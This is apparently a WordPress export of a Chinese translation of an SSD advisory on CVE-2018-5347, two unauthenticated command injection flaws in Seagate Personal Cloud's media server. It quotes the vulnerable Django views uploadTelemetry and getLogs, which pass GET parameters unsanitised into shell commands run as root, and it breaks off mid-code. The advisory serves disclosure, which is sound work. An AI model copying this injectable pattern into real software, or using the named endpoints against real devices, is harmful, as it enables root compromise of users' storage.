{"id":11198,"date":"2018-01-22T14:19:30","date_gmt":"2018-01-22T22:19:30","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4969\/"},"modified":"2018-01-22T14:19:30","modified_gmt":"2018-01-22T22:19:30","slug":"news-4969","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4969\/","title":{"rendered":"SSD\u5b89\u5168\u516c\u544a-\u5e0c\u6377\u4e2a\u4eba\u4e91\u5b58\u50a8\u8bbe\u5907\u591a\u4e2a\u6f0f\u6d1e"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 12:07:17 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3648\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3648');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><br \/> \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e24\u4e2a\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002<\/p>\n<p>\u5e0c\u6377\u4e2a\u4eba\u4e91\u5bb6\u5ead\u5a92\u4f53\u5b58\u50a8\u8bbe\u5907\u662f\u201c\u5b58\u50a8\uff0c\u6574\u7406\uff0c\u6d41\u5f0f\u4f20\u8f93\uff0c\u5171\u4eab\u6240\u6709\u97f3\u4e50\uff0c\u7535\u5f71\uff0c\u7167\u7247\u548c\u91cd\u8981\u6587\u6863\u7684\u6700\u7b80\u5355\u7684\u65b9\u5f0f\u201d\u3002<\/p>\n<p><span id=\"more-3648\"><\/span><\/p>\n<p><strong>\u6f0f\u6d1e\u63d0\u4ea4\u8005<\/strong><br \/> \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458Yorick Koster\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><br \/> \u5e0c\u6377\u572810\u670816\u65e5\u88ab\u544a\u77e5\u8be5\u6f0f\u6d1e\uff0c\u867d\u7136\u5df2\u786e\u8ba4\u6536\u5230\u6f0f\u6d1e\u4fe1\u606f\uff0c\u4f46\u62d2\u7edd\u56de\u5e94\uff08\u6211\u4eec\u7ed9\u51fa\u7684\uff09\u6280\u672f\u7ec6\u8282\uff0c\u4e5f\u6ca1\u6709\u7ed9\u51fa\u786e\u5b9a\u7684\u4fee\u590d\u65f6\u95f4\u6216\u662f\u534f\u8c03\u62a5\u544a\u3002<\/p>\n<p>CVE\uff1aCVE-2018-5347<\/p>\n<p><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><br \/> Seagate Media Server\u4f7f\u7528Django Web\u6846\u67b6\u5e76\u6620\u5c04\u5230.psp\u6269\u5c55\u540d\u3002<\/p>\n<p>\u4efb\u4f55\u4ee5.psp\u7ed3\u5c3e\u7684URL\u90fd\u4f1a\u4f7f\u7528FastCGI\u534f\u8bae\u81ea\u52a8\u53d1\u9001\u5230Seagate Media Server\u5e94\u7528\u7a0b\u5e8f\u3002<\/p>\n<p>\/etc\/lighttpd\/conf.d\/django-host.conf:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a666371ac355404077478\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> fastcgi.server += (  &#8220;.psp&#8221;=&gt;     ((        &#8220;socket&#8221; =&gt; &#8220;\/var\/run\/manage_py-fastcgi.socket&#8221;,        &#8220;check-local&#8221; =&gt; &#8220;disable&#8221;,        &#8220;stream-post&#8221; =&gt; &#8220;enable&#8221;,        &#8220;allow-x-send-file&#8221; =&gt; &#8220;enable&#8221;,     )),  &#8220;.psp\/&#8221;=&gt;     ((        &#8220;socket&#8221; =&gt; &#8220;\/var\/run\/manage_py-fastcgi.socket&#8221;,        &#8220;check-local&#8221; =&gt; &#8220;disable&#8221;,        &#8220;stream-post&#8221; =&gt; &#8220;enable&#8221;,        &#8220;allow-x-send-file&#8221; =&gt; &#8220;enable&#8221;,     ))  )<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>URL\u88ab\u6620\u5c04\u5230\u6587\u4ef6\/usr\/lib\/django_host\/seagate_media_server\/urls.py\u4e2d\u7279\u5b9a\u7684views\u3002<\/p>\n<p>\u6709\u4e24\u4e2aviews\u53d7\u5230\u672a\u7ecf\u8ba4\u8bc1\u7684\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002<\/p>\n<p>\u53d7\u5f71\u54cd\u7684views\u662f\uff1a<\/p>\n<ul>\n<li>uploadTelemetry<\/li>\n<li>getLogs<\/li>\n<\/ul>\n<p>\u8fd9\u4e9bviews\u4eceGET\u53c2\u6570\u83b7\u53d6\u7528\u6237\u8f93\u5165\uff0c\u5e76\u5c06\u8fd9\u4e9b\u672a\u7ecf\u9a8c\u8bc1\/\u89e3\u6790\u7684\u53c2\u6570\u4f20\u9012\u7ed9Python\u6a21\u5757\u76f8\u5e94\u7684\u51fd\u6570\u3002<\/p>\n<p>\u8fd9\u5141\u8bb8\u653b\u51fb\u8005\u6ce8\u5165\u4efb\u610f\u7684\u7cfb\u7edf\u547d\u4ee4\uff0c\u8fd9\u4e9b\u547d\u4ee4\u5c06\u4ee5root\u6743\u9650\u6267\u884c\u3002<\/p>\n<p>\/usr\/lib\/django_host\/seagate_media_server\/views.py\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a666371ac35d480135754\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> @csrf_exempt  def uploadTelemetry(request):     ts = request.GET.get(&#8216;TimeStamp&#8217;,&#8221;)     if (checkDBSQLite()) :        response = &#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;80&#8243;,&#8221;message&#8221;:&#8221;The Database has not been initialized or mounted yet!&#8221;}&#8217;     else :        if ts == &#8220;&#8221;:           response = &#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;380&#8243;,&#8221;message&#8221;:&#8221;TimeStamp parameter missing&#8221;}&#8217;           return HttpResponse(response);        cmd = &#8220;\/usr\/local\/bin\/log_telemetry &#8220;+str(ts)        commands.getoutput(cmd)     return HttpResponse(&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;}&#8217;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-1\"><span class=\"crayon-sy\">@<\/span><span class=\"crayon-e\">csrf_exempt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-2\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">uploadTelemetry<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">ts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;TimeStamp&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">checkDBSQLite<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;80&#8243;,&#8221;message&#8221;:&#8221;The Database has not been initialized or mounted yet!&#8221;}&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;380&#8243;,&#8221;message&#8221;:&#8221;TimeStamp parameter missing&#8221;}&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/usr\/local\/bin\/log_telemetry &#8220;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ts<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">commands<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getoutput<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;}&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p>\/usr\/lib\/django_host\/seagate_media_server\/views.py:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a666371ac361662785131\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> @csrf_exempt  def getLogs (request):     try:        cmd_base=&#8217;\/usr\/bin\/log-extract-manager.sh&#8217;        uID = request.GET.get ( &#8216;arch_id&#8217;, None )        time_stamp = request.GET.get ( &#8216;time_stamp&#8217;, &#8221; )             if uID:           (status, output) = commands.getstatusoutput(cmd_base + &#8216; status &#8216; + uID);           if (&#8216;In progress&#8217; in output) and (uID in output) :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;status&#8221;:&#8221;In Progress&#8221;}}&#8217;)           elif (status == 0) :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;url&#8221;:&#8221;%s&#8221;, &#8220;fileSize&#8221;:&#8221;%d&#8221;}}&#8217; % ( urllib.quote(output.encode(&#8216;utf-8&#8217;)), os.path.getsize(output) ))           else :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;853&#8243;,&#8221;message&#8221;:&#8221;Id not recognized.&#8221;}&#8217; )        else:           (status, output) = commands.getstatusoutput(cmd_base + &#8216; start &#8216; + time_stamp);           if (status == 0) :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;archiveID&#8221;:&#8221;%s&#8221;}}&#8217; % (output))             return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217; )     except :        return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217; )<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-1\"><span class=\"crayon-sy\">@<\/span><span class=\"crayon-e\">csrf_exempt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-2\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">getLogs<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd_base<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;\/usr\/bin\/log-extract-manager.sh&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">uID<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;arch_id&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">None<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">time_stamp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;time_stamp&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-7\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uID<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">commands<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getstatusoutput<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd_base<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216; status &#8216;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uID<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;In progress&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span 